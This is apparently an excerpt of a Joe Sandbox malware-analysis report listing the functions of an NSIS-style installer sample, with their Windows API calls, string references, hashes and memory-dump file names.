ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,?), ref: 00404FFD
SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

N, xrefs: 00405057
M, xrefs: 00404F76
, xrefs: 00405385

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,771B2EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,771B2EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,?), ref: 004056DC
GetDlgItem.USER32(?,?), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,?), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,?), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,?), ref: 0040578D
ShowWindow.USER32(?), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

{, xrefs: 004057F5
(7B, xrefs: 0040587D

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,771B3420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

RichEdit20W, xrefs: 00403D24, 00403D2A
RichEdit, xrefs: 00403D33
RichEd32, xrefs: 00403D14
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
(7B, xrefs: 00403B04
RichEd20, xrefs: 00403D06
.DEFAULT\Control Panel\International, xrefs: 00403B44
_Nb, xrefs: 00403C5C, 00403CC4
.exe, xrefs: 00403BE6

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,?), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,?), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(?,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 0040494D
A, xrefs: 00404973

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,?), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(?,0040A230), ref: 004030F0

Strings

Error launching installer, xrefs: 00402F80
soft, xrefs: 00403020
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Inst, xrefs: 00403017
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Null, xrefs: 00403029

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
